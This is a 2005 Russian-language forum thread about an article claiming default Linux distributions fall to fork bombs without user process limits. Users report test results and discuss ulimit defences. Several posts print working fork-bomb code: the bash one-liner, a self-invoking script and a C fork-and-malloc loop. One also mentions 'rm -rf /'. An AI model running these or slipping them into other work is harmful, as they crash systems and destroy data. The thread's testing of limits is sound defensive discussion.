Forkbomb

[#]

Re: Forkbomb

+ubuntu hoary

~~sakura-obscura~~ (22.03.2005 13:38:46)

[#]

Re: Forkbomb

на 2.6.11-gentoo-r4 не крушит

mic

(22.03.2005 13:48:28)

[#]

Re: Forkbomb

Что такое форк бомб?

anonymous (22.03.2005 13:50:20)

[#]

Re: Forkbomb

Супер-пупер-современные дистрибутивы прорулили.

anonymous (22.03.2005 13:52:19)

[#] Ответ на: Re: Forkbomb от anonymous 22.03.2005 13:50:20

Re: Forkbomb

:(){ :|:& };:

это строка для баша

anonymous (22.03.2005 13:53:27)

[#] Ответ на: Re: Forkbomb от anonymous 22.03.2005 13:50:20

Re: Forkbomb

Неконтролируемое размножение процессов системе, приводящее к ее краху.

~~Sun-ch~~

(22.03.2005 13:56:07)

[#]

Re: Forkbomb

а что такое Land-атака?

dilmah

(22.03.2005 13:58:22)

[#] Ответ на: Re: Forkbomb от dilmah 22.03.2005 13:58:22

Re: Forkbomb

когда приходит пакет с отресом отправителя совпадающим с адресом получателя, и винда от этого дуреет . По слухам, lang атака опять работает в Windows после установки SP2 :)))

anonymous (22.03.2005 14:00:03)

[#] Ответ на: Re: Forkbomb от dilmah 22.03.2005 13:58:22

Re: Forkbomb

когда source IP и destination IP у посланного к машине пакета совпадают

Pi

(22.03.2005 14:01:38)

[#]

Re: Forkbomb

слака через минуту повалилась :(

Pi

(22.03.2005 14:02:21)

[#]

Re: Forkbomb

Фигня все это. Если ulimit позволяет более-менее нормально работать - то злоумышленник все равно может вызвать resource exhaustion, просто чуть менее тривиальными методами. Типа "запускаем process limit программ, каждая из которых выделяет максимально доступное количество памяти, и начинает в цикле записывать по байту в каждую страницу". Еще можно файлов понасоздавать и писать в случайные места. И т.д.

anonymous (22.03.2005 14:02:38)

[#]

Re: Forkbomb

Статья - идиотизм. Думаю, любые *nix будут падать, если лимиты не проставлять. Под *bsd они проставляются на основе login-классов, под linux надо проставлять руками.

Вобщем, я бы таким экспертам руки бы поотрывал...

neru

(22.03.2005 14:02:59)

[#]

Re: Forkbomb

Бред и ерунда :) работает как всегда :) даже лучше чем в hp-ux 11.11 автор гонит :) во первых впросто все уперается в r_limit и этим порожденным процесам форк в цикле возвращает -1 тоесть.. они даже ресурсов почти е выжирают :) пожно зайти под другим пользователем и кильнуть их все :)

а вообще можно проще $cat > f1 f1 & f1 & ^D $chmod u+x f1 $f1

PS проверял на МD 10 rc1

Nesk (22.03.2005 14:03:13)

[#]

Re: Forkbomb

Redhat 9 ядро 2.6.11 - ничего не рушится. Запустил раз 15-20. Прочихалось через какое-то время. Разумеется, стоит максим. число процессов для юзера.

WerNA

(22.03.2005 14:07:12)

[#] Ответ на: Re: Forkbomb от WerNA 22.03.2005 14:07:12

Re: Forkbomb

Гы.. а может имеется ввиду, что в этих дистрибутивах .. без дополнительных настроек.. .. при установки из коробки.. не определены соответсвующие лимиты для пользователей?

Nesk (22.03.2005 14:11:36)

[#]

Re: Forkbomb

http://www.uwsg.iu.edu/hypermail/linux/kernel/0503.2/1151.html

Санычу читать полчаса.

Casus

(22.03.2005 14:17:13)

[#]

Re: Forkbomb

Forkbomb, forkbomb, you're a forkbomb

You can give it to me when I need to come along

:-)

anonymous (22.03.2005 14:18:04)

[#]

Re: Forkbomb

Статью надо было всё-таки почитать. Автор упирает на то, что 1) В шапке, мандрейке и проч. дистрах (кстати, кроме дебиана - там всё ок) по умолчанию не выставлены "разумные" лимиты на локальных пользователей 2) что это всё должно контролирооваться ядром по умолчанию.

steam

(22.03.2005 14:19:12)

[#]

Re: Forkbomb

Сходил, прочитал. Потом попробовал. Ничего не падает, если установлены лимиты на пользовательские процессы. А они, разумеется, установлены... Думаю, откровенная лажа, или пробовали на дистре из коробки, который установлен с настройками по дефолту. Прежде всего, отрывать лапы админу, и пинать по голове до до полного просветления!

:-)

R_Valery

(22.03.2005 14:24:26)

[#] Ответ на: Re: Forkbomb от mic 22.03.2005 13:48:28

Re: Forkbomb

> на 2.6.11-gentoo-r4 не крушит

2.6.11-gentoo-r4 - загнулась через минуту Запускал в иксах с двух консолей.

anonymous (22.03.2005 14:24:33)

[#] Ответ на: Re: Forkbomb от steam 22.03.2005 14:19:12

Re: Forkbomb

Ребята, а вы на голову не долбанулись? Нафига ЯДРУ контролировать это, да еще "по-умолчанию"?!
Нормальная система ограничений - все что нужно. Ядро - оно должно ресурсы предоставлять, а не зажимать. Может, кому-то для вполне штатных действий понадобится породить 1000 потомков (апачу каком-нибудь), а ядро скаже - фигушки! у меня лимит на 100. Может еще и перекомпиляцию потребуете, новаторы, блин...

annoynimous

(22.03.2005 14:28:50)

[#] Ответ на: Re: Forkbomb от steam 22.03.2005 14:19:12

Re: Forkbomb

>1) В шапке, мандрейке и проч. дистрах

Прошу прощения, деиствительно как-то пропустил... Но это не даёт право на безграмотное администрирование систем! После установки система должна быть настроена конкретно для каждого пользователя (IMHO).

R_Valery

(22.03.2005 14:32:31)

[#]

Re: Forkbomb

2.6.9-gentoo-r1, ничего не происходит, ничего специально не настраивал.

Sirko

(22.03.2005 14:35:31)

[#]

Re: Forkbomb

Кто-нибудь расскажите мне что-такое установка по-умолчанию для Gentoo?

anonymous (22.03.2005 14:41:06)

[#] Ответ на: Re: Forkbomb от Sirko 22.03.2005 14:35:31

Re: Forkbomb

Вы что, не понимаете??? Версия ядра никому не интересна - важно, как настроены лимиты пользователей!!!

annoynimous

(22.03.2005 14:43:05)

[#]

Re: Forkbomb

Меня всегда мучил вопрос по-поводу установки CPU Time ... У кого сколько стоит для регулярного пользователя? 100 минут хватит? :)

rusxakep

(22.03.2005 14:43:47)

[#] Ответ на: Re: Forkbomb от steam 22.03.2005 14:19:12

Re: Forkbomb

Вообще то RLIMIT_NPROC устанавливается в ядре!!! конечно и обычный пользователь его увеличить не может!
fork.c:129:     init_task.signal->rlim[RLIMIT_NPROC].rlim_cur = max_threads/2;
fork.c:130:     init_task.signal->rlim[RLIMIT_NPROC].rlim_max = max_threads/2;

fork.c:121:     max_threads = mempages / (8 * THREAD_SIZE / PAGE_SIZE);
fork.c:126:     if(max_threads < 20)
fork.c:127:             max_threads = 20;


так вот :) дома у меня RLIMIT_NPROC (по умолчанию) 4095
на работе 3839

так что

Nesk (22.03.2005 14:44:29)

[#]

Re: Forkbomb

Debian как всегда взрулил :-)

dmitrmax

(22.03.2005 14:49:40)

[#] Ответ на: Re: Forkbomb от Pi 22.03.2005 14:01:38

Re: Forkbomb

>когда source IP и destination IP у посланного к машине пакета >совпадают

Просто хотел спросить а если общаться с другим процессом через локалхост то неужели все валится?

anonymous (22.03.2005 15:08:10)

[#]

Re: Forkbomb

А как красиво можно разнести систему, если запустить "rm -rf /" из-под рута...

anonymous (22.03.2005 15:12:35)

[#]

Re: Forkbomb

Почетайте коментарии к оригинальной статье, автора обосрали по полной
да он и вправду дурачек

gopakita

(22.03.2005 15:17:04)

[#] Ответ на: Re: Forkbomb от anonymous 22.03.2005 15:12:35

Re: Forkbomb

"Это не новость" @ LOR

anonymous (22.03.2005 15:20:20)

[#] Ответ на: Re: Forkbomb от rusxakep 22.03.2005 14:43:47

Re: Forkbomb

А в чем, собственно, проблема? Ежели шелл не давать никому (типичный десктоп) , то на кой эти лимиты по умолчанию. Ну повесит чайник десктоп, да и барабан ему на шею. Редко на каком серваке шелл простому смертному открыт. Ну а там где это делают, дураков уже перестреляли.

anonymous (22.03.2005 15:21:45)

[#]

Re: Forkbomb

Solaris 9 the same problem

anonymous (22.03.2005 15:23:07)

[#]

Re: Forkbomb

спокойно порушит. даже если ограничение в улимите на процессы и выделяемую память. 

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

int main(void){

        while (fork()){
        }

        while (1){
                malloc(1024);
        }

        return 0;
}

swar0g

(22.03.2005 16:06:13)

[#] Ответ на: Re: Forkbomb от Pi 22.03.2005 14:02:21

Re: Forkbomb

slackware 10.0 не упал :) - покряхтел минуты две и ожил (без ребута :)))

anonymous (22.03.2005 16:36:57)

[#] Ответ на: Re: Forkbomb от anonymous 22.03.2005 16:36:57

Re: Forkbomb

>>slackware 10.0 не упал :) - покряхтел минуты две и ожил (без ребута :)))
и чего сказал когда ожил?
вообще програмка страшная :)
покажи что там у тебя в ulimit -a

Nesk (22.03.2005 17:09:07)

[#] Ответ на: Re: Forkbomb от Nesk 22.03.2005 17:09:07

Re: Forkbomb

bash: fork: Resource temporarily unavailable

core file size        (blocks, -c) 0
data seg size         (kbytes, -d) unlimited
file size             (blocks, -f) unlimited
max locked memory     (kbytes, -l) unlimited
max memory size       (kbytes, -m) unlimited
open files                    (-n) 1024
pipe size          (512 bytes, -p) 8
stack size            (kbytes, -s) unlimited
cpu time             (seconds, -t) unlimited
max user processes            (-u) 1791
virtual memory        (kbytes, -v) unlimited

anonymous (22.03.2005 17:29:40)

[#] Ответ на: Re: Forkbomb от anonymous 22.03.2005 13:53:27

Re: Forkbomb

> :(){ :|:& };:

> это строка для баша

Не работает. Скрипт содержащий одну строчку: $0 ; $0 & - работает форк бомбой (в иксах можно успеть нажать ctrl alt backspace).

sin_a

(22.03.2005 17:31:11)

[#] Ответ на: Re: Forkbomb от swar0g 22.03.2005 16:06:13

Re: Forkbomb

так кто уже нашёл панацею против приведённого мной выше примера?

swar0g

(22.03.2005 17:49:48)

[#] Ответ на: Re: Forkbomb от swar0g 22.03.2005 17:49:48

Re: Forkbomb

Я бы конечно попробовал поигратся, но вдруг сервер у ребят упадет?

В прошлый раз они здорово расстроились, когда я диск с рейзером им

ухандокал.

~~Sun-ch~~

(22.03.2005 17:59:40)

[#] Ответ на: Re: Forkbomb от swar0g 22.03.2005 17:49:48

Re: Forkbomb

Я запустил с ulimit -m 8192 -u 100 :)

Такая вот секурная система :).

McGray

(22.03.2005 18:00:45)

[#]

Re: Forkbomb

ааааааа! как генту раскомпилировать до старой?

anonymous (22.03.2005 18:20:28)

[#] Ответ на: Re: Forkbomb от sin_a 22.03.2005 17:31:11

Re: Forkbomb

>> :(){ :|:& };:

>> это строка для баша

>Не работает. Скрипт содержащий одну строчку: $0 ; $0 & - работает форк бомбой (в иксах можно успеть нажать ctrl alt backspace).

а у меня сработало :)

anonymous (22.03.2005 18:25:04)

[#]

Re: Forkbomb

в который раз луникс отссосал у бзди, а все потому, что не учатся на своих ошибках :)
все-таки не подходят луниксы для серверов - desktop only.

anonymous (22.03.2005 18:38:22)

[#] Ответ на: Re: Forkbomb от anonymous 22.03.2005 18:38:22

Re: Forkbomb

>>в который раз луникс отссосал у бзди, а все потому, что не учатся на своих ошибках :)
>>все-таки не подходят луниксы для серверов - desktop only.

форкбомба она и в бзди форкбомба.. да и в винде тоже

Nesk (22.03.2005 18:41:12)

[#] Ответ на: Re: Forkbomb от swar0g 22.03.2005 17:49:48

Re: Forkbomb

так кто уже нашёл панацею против приведённого мной выше примера?

ulimit -u 128
ulimit -v = ($pc_mem_in_kb * 0.9)/128
./forkbomb

:)

Cosmicman

(22.03.2005 18:58:19)

[#] Ответ на: Re: Forkbomb от Cosmicman 22.03.2005 18:58:19

Re: Forkbomb

даже на себе проверил :))

sergei@space ~$ ulimit -u 128
sergei@space ~$ ulimit -v 8045
sergei@space ~$ ./forkbomb &
[1] 751
sergei@space ~$ top
bash: fork: Resource temporarily unavailable
:)))

*зашел с другой консоли*

sergei@space ~$ top

  8:19pm  up 56 min,  2 users,  load average: 140.72, 47.33, 7.16
177 processes: 46 sleeping, 131 running, 0 zombie, 0 stopped
CPU states: 28.4% user, 71.6% system,  0.0% nice,  0.0% idle
Mem:  1029808K av,  735552K used,  220304K free,       0K shrd,   19184K buff
Swap:  265032K av,   28828K used,  236204K free                   54768K cached

  PID USER     PRI  NI  SIZE  RSS SHARE STAT %CPU %MEM   TIME COMMAND
  756 sergei    20   0  3740 3740   464 R     1.2  0.4   0:02 forkbomb
  758 sergei    20   0  3740 3740   464 R     1.0  0.4   0:02 forkbomb
  762 sergei    20   0  3740 3740   464 R     1.6  0.4   0:02 forkbomb
  751 sergei    20   0   488  488   456 R     1.4  0.1   0:01 forkbomb
  752 sergei    20   0  3740 3740   464 R     1.4  0.4   0:02 forkbomb
  753 sergei    20   0  3740 3740   464 R     1.4  0.4   0:02 forkbomb
  754 sergei    20   0  3740 3740   464 R     1.4  0.4   0:02 forkbomb
  755 sergei    20   0  3740 3740   464 R     1.4  0.4   0:02 forkbomb
  757 sergei    20   0  3740 3740   464 R     1.4  0.4   0:02 forkbomb
  759 sergei    20   0  3740 3740   464 R     1.4  0.4   0:02 forkbomb
  760 sergei    20   0  3740 3740   464 R     1.4  0.4   0:02 forkbomb
  761 sergei    20   0  3740 3740   464 R     1.4  0.4   0:02 forkbomb
  771 sergei    20   0  3740 3740   464 R     1.4  0.4   0:02 forkbomb
  780 sergei    14   0  3740 3740   464 R     1.4  0.4   0:02 forkbomb
  781 sergei    14   0  3740 3740   464 R     1.4  0.4   0:02 forkbomb
  782 sergei    14   0  3740 3740   464 R     1.4  0.4   0:02 forkbomb
  783 sergei    14   0  3740 3740   464 R     1.4  0.4   0:02 forkbomb
  784 sergei    14   0  3740 3740   464 R     1.4  0.4   0:02 forkbomb
[...]

sergei@space ~$ 


в логах такая шняга:

grsec: attempted resource overstep by requesting 5791744 for RLIMIT_AS against limit 4745216 by (forkbomb:757) UID(500) EUID(500), parent (forkbomb:751) UID(500) EUID(500)
grsec: attempted resource overstep by requesting 4747264 for RLIMIT_AS against limit 4745216 by (forkbomb:757) UID(500) EUID(500), parent (forkbomb:751) UID(500) EUID(500)
grsec: more alerts, logging disabled for 10 seconds

Cosmicman

(22.03.2005 19:27:37)

[#]

Re: Forkbomb

А я думал, что это как в C - "вы берете и простреливаете себе ногу".Т.е. если ты не выставил сам разумные ограничения, то будешь сам себе злобный буратина.

ant

(22.03.2005 19:28:50)

[#] Ответ на: Re: Forkbomb от Nesk 22.03.2005 18:41:12

Re: Forkbomb

ну не скажи, не скажи
запустил 5 консолей, на секунду тормознула мышь - а потом все нормализовалось (ulimit вообще не трогал)

http://x97rang.freeshell.org/snapshot.png

а вот slackware 9.1 повисла намертво и пришлось вспомнить про кнопку...

x97Rang

(22.03.2005 20:32:54)